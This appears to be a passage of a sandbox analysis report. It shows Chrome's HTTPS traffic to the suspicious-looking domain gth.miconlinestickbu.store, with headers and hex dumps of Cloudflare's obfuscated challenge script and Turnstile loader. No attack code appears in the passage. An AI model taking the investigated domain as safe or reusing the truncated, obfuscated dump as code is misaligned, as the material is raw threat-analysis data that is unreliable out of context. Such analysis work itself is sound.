                                    content-length: 0
                                    date: Wed, 22 May 2024 15:08:59 GMT
                                    Via: 1.1 google
                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                    Connection: close


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.449775104.21.21.444433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:08:59 UTC967OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=887db9822f538c41 HTTP/1.1
                                    Host: gth.miconlinestickbu.store
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "117.0.5938.132"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: same-origin
                                    Sec-Fetch-Mode: no-cors
                                    Sec-Fetch-Dest: script
                                    Referer: https://gth.miconlinestickbu.store/?__cf_chl_rt_tk=H7Kss6sfscBU7.EIkr.rv_soEijdzH_mBbfnGlV9NZE-1716390538-0.0.1.1-1578
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:08:59 UTC682INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:08:59 GMT
                                    Content-Type: application/javascript; charset=UTF-8
                                    Content-Length: 393101
                                    Connection: close
                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PF%2Fg%2F8S7Pd8v%2FcSf2Ls43NzJgXgFSDWY6mN1jhiz3TxBbmUEhRDMSZ9wYs3rV6g5gyP4%2FT2Mf0fw%2Ft3IE45CkJjbb0K5MBM5gMhh%2B%2BsFdPl5xKE1MZLqUlGt3mCzXIxoIeyndW1no1l2k9FcYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 887db9870a664375-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:08:59 UTC687INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 53 52 3d 74 72 75 65 3b 7e 66 75 6e 63 74 69 6f 6e 28 69 39 2c 66 76 2c 66 77 2c 66 78 2c 66 45 2c 66 47 2c 66 52 2c 66 54 2c 66 55 2c 66 56 2c 66 57 2c 66 58 2c 66 59 2c 66 5a 2c 67 30 2c 67 31 2c 67 32 2c 67 33 2c 67 34 2c 67 35 2c 67 36 2c 67 37 2c 67 38 2c 67 39 2c 67 61 2c 67 62 2c 67 63 2c 67 64 2c 67 65 2c 67 66 2c 67 67 2c 67 68 2c 67 69 2c 67 6a 2c 67 6b 2c 67 6c 2c 67 6d 2c 67 6e 2c 67 6f 2c 67 70 2c 67 71 2c 67 72 2c 67 73 2c 67 74 2c 67 75 2c 67 76 2c 67 77 2c 67 78 2c 67 79 2c 67 7a 2c 67 41 2c 67 42 2c 67 43 2c 67 44 2c 67 45 2c 67 47 2c 67 54 2c 68 36 2c 68 39 2c 68 6c 2c 68 70 2c 68 74 2c 68
                                    Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.uaSR=true;~function(i9,fv,fw,fx,fE,fG,fR,fT,fU,fV,fW,fX,fY,fZ,g0,g1,g2,g3,g4,g5,g6,g7,g8,g9,ga,gb,gc,gd,ge,gf,gg,gh,gi,gj,gk,gl,gm,gn,go,gp,gq,gr,gs,gt,gu,gv,gw,gx,gy,gz,gA,gB,gC,gD,gE,gG,gT,h6,h9,hl,hp,ht,h
                                    2024-05-22 15:08:59 UTC1369INData Raw: 68 69 73 7c 7c 73 65 6c 66 2c 66 77 3d 66 76 5b 69 39 28 31 34 34 39 29 5d 2c 66 78 3d 66 75 6e 63 74 69 6f 6e 28 69 61 2c 64 2c 65 2c 66 2c 67 29 7b 72 65 74 75 72 6e 20 69 61 3d 69 39 2c 64 3d 7b 27 45 69 58 54 53 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 47 4c 62 4a 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 76 41 58 69 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 50 76 43 77 64 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 44 51 45 7a 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 79 43 57 59 4c 27 3a 66 75 6e 63 74 69 6f 6e 28
                                    Data Ascii: his||self,fw=fv[i9(1449)],fx=function(ia,d,e,f,g){return ia=i9,d={'EiXTS':function(h,i){return h-i},'GLbJh':function(h,i){return h==i},'vAXiG':function(h,i){return h+i},'PvCwd':function(h,i){return h(i)},'DQEzh':function(h,i){return i|h},'yCWYL':function(
                                    2024-05-22 15:08:59 UTC1369INData Raw: 20 68 3d 3d 6e 75 6c 6c 3f 27 27 3a 66 2e 67 28 68 2c 36 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 69 62 29 7b 72 65 74 75 72 6e 20 69 62 3d 62 2c 69 62 28 38 30 33 29 5b 69 62 28 31 38 39 35 29 5d 28 69 29 7d 29 7d 2c 27 67 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 69 63 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4c 2c 4d 29 7b 69 66 28 69 63 3d 69 61 2c 64 5b 69 63 28 31 39 34 33 29 5d 28 6e 75 6c 6c 2c 69 29 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 78 3d 7b 7d 2c 42 3d 7b 7d 2c 43 3d 27 27 2c 44 3d 32 2c 45 3d 33 2c 46 3d 32 2c 47 3d 5b 5d 2c 48 3d 30 2c 49 3d 30 2c 4a 3d 30 3b 4a 3c 69 5b 69 63 28 34 37 33 29 5d 3b 4a 2b 3d 31 29 69 66 28 4b 3d 69 5b 69 63 28 31 38 39 35 29 5d 28 4a 29 2c 4f 62 6a 65 63 74 5b 69 63
                                    Data Ascii: h==null?'':f.g(h,6,function(i,ib){return ib=b,ib(803)[ib(1895)](i)})},'g':function(i,j,o,ic,s,x,B,C,D,E,F,G,H,I,J,K,L,M){if(ic=ia,d[ic(1943)](null,i))return'';for(x={},B={},C='',D=2,E=3,F=2,G=[],H=0,I=0,J=0;J<i[ic(473)];J+=1)if(K=i[ic(1895)](J),Object[ic
                                    2024-05-22 15:08:59 UTC1369INData Raw: 31 33 31 29 5d 28 32 35 36 2c 43 5b 69 63 28 31 38 32 32 29 5d 28 30 29 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 69 63 28 32 32 34 32 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 63 28 35 33 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 69 63 28 31 38 32 32 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 64 5b 69 63 28 37 39 32 29 5d 28 48 3c 3c 31 2e 37 35 2c 64 5b 69 63 28 37 37 35 29 5d 28 4d 2c 31 29 29 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 63 28 35 33 30 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 64 5b 69 63 28 32 31 39 38 29 5d 28 73 2c 46 29 3b 48 3d 64
                                    Data Ascii: 131)](256,C[ic(1822)](0))){for(s=0;d[ic(2242)](s,F);H<<=1,j-1==I?(I=0,G[ic(530)](o(H)),H=0):I++,s++);for(M=C[ic(1822)](0),s=0;8>s;H=d[ic(792)](H<<1.75,d[ic(775)](M,1)),j-1==I?(I=0,G[ic(530)](o(H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;d[ic(2198)](s,F);H=d
                                    2024-05-22 15:08:59 UTC1369INData Raw: 3b 4c 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 67 28 31 39 35 32 29 5d 28 64 5b 69 67 28 31 35 36 31 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 4d 3d 65 28 4a 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 67 28 31 35 32 30 29 5d 28 32 2c 31 36 29 2c 46 3d 31 3b 4b 21 3d 46 3b 4c 3d 64 5b 69 67 28 31 37 39 30 29 5d 28 47 2c 48 29 2c 48 3e 3e 3d 31 2c 64 5b 69 67 28 32 35 30 30 29 5d 28 30 2c 48 29 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 67 28 32 35 32 38 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 67 28 32 35 35 34 29 5d 28 64 5b 69 67 28 37 32 39 29 5d 28 30 2c 4c 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b
                                    Data Ascii: ;L=G&H,H>>=1,H==0&&(H=j,G=o(I++)),J|=d[ig(1952)](d[ig(1561)](0,L)?1:0,F),F<<=1);M=e(J);break;case 1:for(J=0,K=Math[ig(1520)](2,16),F=1;K!=F;L=d[ig(1790)](G,H),H>>=1,d[ig(2500)](0,H)&&(H=j,G=d[ig(2528)](o,I++)),J|=d[ig(2554)](d[ig(729)](0,L)?1:0,F),F<<=1);
                                    2024-05-22 15:08:59 UTC1369INData Raw: 74 75 72 6e 20 67 28 68 2c 69 2c 6a 29 7d 2c 27 4a 71 61 75 58 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 2b 68 7d 2c 27 41 61 68 50 50 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 3c 3c 68 7d 7d 2c 64 3d 66 4b 28 29 2c 65 3d 66 76 5b 69 4c 28 35 31 32 29 5d 28 66 4d 28 64 29 29 2c 63 5b 69 4c 28 35 34 37 29 5d 28 69 73 4e 61 4e 2c 65 29 26 26 28 65 3d 30 29 2c 63 5b 69 4c 28 32 30 38 36 29 5d 28 66 4e 2c 64 2c 63 5b 69 4c 28 31 34 34 33 29 5d 28 65 2c 31 29 2c 31 29 2c 66 3d 31 65 33 2a 66 76 5b 69 4c 28 31 34 32 39 29 5d 5b 69 4c 28 32 35 31 33 29 5d 28 63 5b 69 4c 28 32 30 36 34 29 5d 28 32 2c 65 29 2c 33 32 29 2c 66 76 5b 69 4c 28 31 35 39 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 4d 29 7b 69 4d
                                    Data Ascii: turn g(h,i,j)},'JqauX':function(g,h){return g+h},'AahPP':function(g,h){return g<<h}},d=fK(),e=fv[iL(512)](fM(d)),c[iL(547)](isNaN,e)&&(e=0),c[iL(2086)](fN,d,c[iL(1443)](e,1),1),f=1e3*fv[iL(1429)][iL(2513)](c[iL(2064)](2,e),32),fv[iL(1592)](function(iM){iM
                                    2024-05-22 15:08:59 UTC1369INData Raw: 29 5d 29 2c 66 76 5b 69 4e 28 32 33 32 33 29 5d 5b 69 4e 28 32 31 38 30 29 5d 29 2b 27 2f 27 2b 66 76 5b 69 4e 28 32 33 32 33 29 5d 5b 69 4e 28 37 35 37 29 5d 2b 27 2f 27 2c 66 76 5b 69 4e 28 32 33 32 33 29 5d 5b 69 4e 28 32 35 36 32 29 5d 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 7d 63 61 74 63 68 28 45 29 7b 7d 7d 2c 66 76 5b 69 39 28 32 30 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 64 2c 65 2c 66 2c 67 2c 68 2c 69 4f 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 28 69 4f 3d 69 39 2c 69 3d 7b 7d 2c 69 5b 69 4f 28 31 30 31 36 29 5d 3d 69 4f 28 31 31 32 30 29 2c 69 5b 69 4f 28 32 36 37 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74 75 72 6e 20 6e 3e 6f 7d 2c 69 5b 69 4f 28 38 38 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 72 65 74
                                    Data Ascii: )]),fv[iN(2323)][iN(2180)])+'/'+fv[iN(2323)][iN(757)]+'/',fv[iN(2323)][iN(2562)]);continue}break}}catch(E){}},fv[i9(2026)]=function(d,e,f,g,h,iO,i,j,k,l,m){(iO=i9,i={},i[iO(1016)]=iO(1120),i[iO(2679)]=function(n,o){return n>o},i[iO(886)]=function(n,o){ret
                                    2024-05-22 15:08:59 UTC1369INData Raw: 37 34 29 5d 3d 69 39 28 31 38 30 33 29 2c 66 54 5b 69 39 28 31 30 39 39 29 5d 3d 69 39 28 32 35 32 39 29 2c 66 54 5b 69 39 28 32 32 39 38 29 5d 3d 69 39 28 37 34 32 29 2c 66 54 5b 69 39 28 35 34 32 29 5d 3d 69 39 28 31 30 31 38 29 2c 66 54 5b 69 39 28 31 39 36 32 29 5d 3d 69 39 28 32 31 37 36 29 2c 66 55 3d 7b 7d 2c 66 55 5b 69 39 28 34 39 35 29 5d 3d 69 39 28 31 32 39 38 29 2c 66 55 5b 69 39 28 38 38 37 29 5d 3d 69 39 28 37 32 36 29 2c 66 55 5b 69 39 28 38 39 31 29 5d 3d 69 39 28 36 34 39 29 2c 66 55 5b 69 39 28 31 37 36 35 29 5d 3d 69 39 28 36 37 31 29 2c 66 55 5b 69 39 28 37 30 32 29 5d 3d 69 39 28 31 31 32 36 29 2c 66 55 5b 69 39 28 31 30 35 37 29 5d 3d 69 39 28 31 30 37 39 29 2c 66 55 5b 69 39 28 38 39 30 29 5d 3d 69 39 28 36 33 33 29 2c 66 55 5b 69
                                    Data Ascii: 74)]=i9(1803),fT[i9(1099)]=i9(2529),fT[i9(2298)]=i9(742),fT[i9(542)]=i9(1018),fT[i9(1962)]=i9(2176),fU={},fU[i9(495)]=i9(1298),fU[i9(887)]=i9(726),fU[i9(891)]=i9(649),fU[i9(1765)]=i9(671),fU[i9(702)]=i9(1126),fU[i9(1057)]=i9(1079),fU[i9(890)]=i9(633),fU[i
                                    2024-05-22 15:08:59 UTC1369INData Raw: 36 32 29 5d 3d 69 39 28 31 31 30 36 29 2c 66 57 3d 7b 7d 2c 66 57 5b 69 39 28 34 39 35 29 5d 3d 69 39 28 32 33 31 39 29 2c 66 57 5b 69 39 28 38 38 37 29 5d 3d 69 39 28 31 39 32 35 29 2c 66 57 5b 69 39 28 38 39 31 29 5d 3d 69 39 28 32 34 36 30 29 2c 66 57 5b 69 39 28 31 37 36 35 29 5d 3d 69 39 28 37 30 38 29 2c 66 57 5b 69 39 28 37 30 32 29 5d 3d 69 39 28 31 34 36 36 29 2c 66 57 5b 69 39 28 31 30 35 37 29 5d 3d 69 39 28 38 31 36 29 2c 66 57 5b 69 39 28 38 39 30 29 5d 3d 69 39 28 32 33 31 36 29 2c 66 57 5b 69 39 28 32 32 36 38 29 5d 3d 69 39 28 31 31 38 35 29 2c 66 57 5b 69 39 28 32 35 31 34 29 5d 3d 69 39 28 31 39 36 37 29 2c 66 57 5b 69 39 28 31 36 38 36 29 5d 3d 69 39 28 32 35 31 30 29 2c 66 57 5b 69 39 28 32 30 33 33 29 5d 3d 69 39 28 35 34 38 29 2c 66
                                    Data Ascii: 62)]=i9(1106),fW={},fW[i9(495)]=i9(2319),fW[i9(887)]=i9(1925),fW[i9(891)]=i9(2460),fW[i9(1765)]=i9(708),fW[i9(702)]=i9(1466),fW[i9(1057)]=i9(816),fW[i9(890)]=i9(2316),fW[i9(2268)]=i9(1185),fW[i9(2514)]=i9(1967),fW[i9(1686)]=i9(2510),fW[i9(2033)]=i9(548),f
                                    2024-05-22 15:08:59 UTC1369INData Raw: 32 29 2c 66 59 5b 69 39 28 31 37 36 35 29 5d 3d 69 39 28 39 34 34 29 2c 66 59 5b 69 39 28 37 30 32 29 5d 3d 69 39 28 38 30 38 29 2c 66 59 5b 69 39 28 31 30 35 37 29 5d 3d 69 39 28 32 30 34 34 29 2c 66 59 5b 69 39 28 38 39 30 29 5d 3d 69 39 28 32 36 33 35 29 2c 66 59 5b 69 39 28 32 32 36 38 29 5d 3d 69 39 28 32 35 31 31 29 2c 66 59 5b 69 39 28 32 35 31 34 29 5d 3d 69 39 28 31 37 37 33 29 2c 66 59 5b 69 39 28 31 36 38 36 29 5d 3d 69 39 28 32 31 30 32 29 2c 66 59 5b 69 39 28 32 30 33 33 29 5d 3d 69 39 28 39 30 31 29 2c 66 59 5b 69 39 28 32 33 33 32 29 5d 3d 69 39 28 31 36 35 35 29 2c 66 59 5b 69 39 28 38 36 31 29 5d 3d 69 39 28 32 32 37 39 29 2c 66 59 5b 69 39 28 31 35 39 31 29 5d 3d 69 39 28 31 36 35 39 29 2c 66 59 5b 69 39 28 31 39 39 36 29 5d 3d 69 39 28
                                    Data Ascii: 2),fY[i9(1765)]=i9(944),fY[i9(702)]=i9(808),fY[i9(1057)]=i9(2044),fY[i9(890)]=i9(2635),fY[i9(2268)]=i9(2511),fY[i9(2514)]=i9(1773),fY[i9(1686)]=i9(2102),fY[i9(2033)]=i9(901),fY[i9(2332)]=i9(1655),fY[i9(861)]=i9(2279),fY[i9(1591)]=i9(1659),fY[i9(1996)]=i9(


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.449777104.17.3.1844433236C:\Program Files\Google\Chrome\Application\chrome.exe
                                    TimestampBytes transferredDirectionData
                                    2024-05-22 15:09:00 UTC594OUTGET /turnstile/v0/b/695da7821231/api.js?onload=gayxv3&render=explicit HTTP/1.1
                                    Host: challenges.cloudflare.com
                                    Connection: keep-alive
                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                    Origin: https://gth.miconlinestickbu.store
                                    sec-ch-ua-mobile: ?0
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    Accept: */*
                                    Sec-Fetch-Site: cross-site
                                    Sec-Fetch-Mode: cors
                                    Sec-Fetch-Dest: script
                                    Accept-Encoding: gzip, deflate, br
                                    Accept-Language: en-US,en;q=0.9
                                    2024-05-22 15:09:00 UTC346INHTTP/1.1 200 OK
                                    Date: Wed, 22 May 2024 15:09:00 GMT
                                    Content-Type: application/javascript; charset=UTF-8
                                    Content-Length: 42527
                                    Connection: close
                                    cache-control: max-age=604800, public
                                    cross-origin-resource-policy: cross-origin
                                    access-control-allow-origin: *
                                    Server: cloudflare
                                    CF-RAY: 887db98f9f115e5f-EWR
                                    alt-svc: h3=":443"; ma=86400
                                    2024-05-22 15:09:00 UTC1023INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 45 74 28 65 2c 61 2c 72 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 62 3d 65 5b 75 5d 28 67 29 2c 5f 3d 62 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 72 28 73 29 3b 72 65 74 75 72 6e 7d 62 2e 64 6f 6e 65 3f 61 28 5f 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 5f 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 77 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 72 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 61 2c 72 29 3b 66 75 6e 63 74
                                    Data Ascii: "use strict";(function(){function Et(e,a,r,o,c,u,g){try{var b=e[u](g),_=b.value}catch(s){r(s);return}b.done?a(_):Promise.resolve(_).then(o,c)}function wt(e){return function(){var a=this,r=arguments;return new Promise(function(o,c){var u=e.apply(a,r);funct
                                    2024-05-22 15:09:00 UTC1369INData Raw: 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 65 2c 61 29 7b 72 65 74 75 72 6e 20 61 3d 61 21 3d 6e 75 6c 6c 3f 61 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 65 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 73 28 61 29 29 3a 64 72 28 4f 62 6a 65 63 74 28 61 29 29 2e 66 6f 72 45 61 63 68
                                    Data Ascii: r(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),r.push.apply(r,o)}return r}function Tt(e,a){return a=a!=null?a:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(a)):dr(Object(a)).forEach
                                    2024-05-22 15:09:00 UTC1369INData Raw: 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 2c 61 29 7b 76 61 72 20 72 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30 5d 26 31 29 74 68 72 6f 77 20 75 5b 31 5d 3b 72 65 74 75 72 6e 20 75 5b 31 5d 7d 2c 74 72 79 73 3a 5b 5d 2c 6f 70 73 3a 5b 5d 7d 2c 6f 2c 63 2c 75 2c 67 3b 72 65 74 75 72 6e 20 67 3d 7b 6e 65 78 74 3a 62 28 30 29 2c 74 68 72 6f 77 3a 62 28 31 29 2c 72 65 74 75 72 6e 3a 62 28 32 29 7d 2c 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 28 67
                                    Data Ascii: urn e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ce(e,a){var r={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:b(0),throw:b(1),return:b(2)},typeof Symbol=="function"&&(g
                                    2024-05-22 15:09:00 UTC1369INData Raw: 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 43 74 3d 33 30 30 30 32 30 3b 76 61 72 20 4e 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c 65 2e 4e 4f 4e 5f 49 4e 54 45 52 41 43 54 49 56 45 3d 22 6e 6f 6e 2d 69 6e 74 65 72 61 63 74 69 76 65 22 2c 65 2e 49 4e 56 49 53 49 42 4c 45 3d 22 69 6e 76 69 73 69 62 6c 65 22 7d 29 28 55 7c 7c 28 55 3d 7b 7d 29 29 3b 76 61 72 20 56 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 4f 52 4d 41 4c 3d 22 6e 6f 72 6d 61 6c 22
                                    Data Ascii: ked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Ct=300020;var Ne=300030;var U;(function(e){e.MANAGED="managed",e.NON_INTERACTIVE="non-interactive",e.INVISIBLE="invisible"})(U||(U={}));var V;(function(e){e.NORMAL="normal"
                                    2024-05-22 15:09:00 UTC1369INData Raw: 74 72 69 6e 67 22 26 26 76 72 2e 74 65 73 74 28 65 29 7d 76 61 72 20 6d 72 3d 2f 5e 5b 61 2d 7a 30 2d 39 5f 5c 2d 3d 5d 7b 30 2c 32 35 35 7d 24 2f 69 3b 66 75 6e 63 74 69 6f 6e 20 5a 65 28 65 29 7b 72 65 74 75 72 6e 20 65 3d 3d 3d 76 6f 69 64 20 30 3f 21 30 3a 74 79 70 65 6f 66 20 65 3d 3d 22 73 74 72 69 6e 67 22 26 26 6d 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 65 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 6e 6f 72 6d 61 6c 22 2c 22 63 6f 6d 70 61 63 74 22 2c 22 69 6e 76 69 73 69 62 6c 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28 5b 22 61 75 74 6f 22 2c 22 6d 61 6e 75 61 6c 22 2c 22 6e 65 76 65 72 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 72 74 28 65 29 7b 72 65 74 75 72 6e 20 4e 28
                                    Data Ascii: tring"&&vr.test(e)}var mr=/^[a-z0-9_\-=]{0,255}$/i;function Ze(e){return e===void 0?!0:typeof e=="string"&&mr.test(e)}function et(e){return N(["normal","compact","invisible"],e)}function tt(e){return N(["auto","manual","never"],e)}function rt(e){return N(
                                    2024-05-22 15:09:00 UTC1369INData Raw: 74 75 72 6e 73 74 69 6c 65 2f 69 66 2f 6f 76 32 2f 61 76 30 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 61 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2e 73 69 7a 65 29 2e 63 6f 6e 63 61 74 28 73 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 65 28 65 29 7b 69 66 28 65 3d 3d 3d 76 6f 69 64 20 30 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 71 74 28 65 2c 61 29 7b
                                    Data Ascii: turnstile/if/ov2/av0/rcv").concat(o,"/").concat(e,"/").concat(a,"/").concat(r.theme,"/").concat(r.size).concat(s)}function Le(e){if(e===void 0)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return e}function qt(e,a){
